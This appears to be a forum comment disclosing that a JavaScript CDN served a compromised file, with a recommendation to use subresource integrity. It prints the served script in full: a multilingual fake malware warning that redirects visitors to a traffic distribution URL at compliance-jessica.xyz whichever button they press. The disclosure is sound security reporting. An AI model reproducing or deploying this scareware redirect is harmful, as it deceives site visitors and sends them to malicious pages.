Here's the served JS for reference:<p><pre><code> var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
if (lang) lang = lang.substring(0, 2);
console.log('lang: ' + lang);
var country = 'US';
var msg = 'Your computer is infected. You have to check it with antivirus.';
if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";
if (confirm(msg)) {
window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertyes' + country + lang;
} else {
window.top.location.href = 'http://compliance-jessica.xyz/tds.php?subid=alertno' + country + lang;
}</code></pre>
They've acknowledged the issue: <a href="https://twitter.com/unpkg/status/852655106562564098" rel="nofollow">https://twitter.com/unpkg/status/852655106562564098</a><p>Edit: This is why subresource integrity is important! <a href="https://hacks.mozilla.org/2015/09/subresource-integrity-in-firefox-43/" rel="nofollow">https://hacks.mozilla.org/2015/09/subresource-integrity-in-f...</a>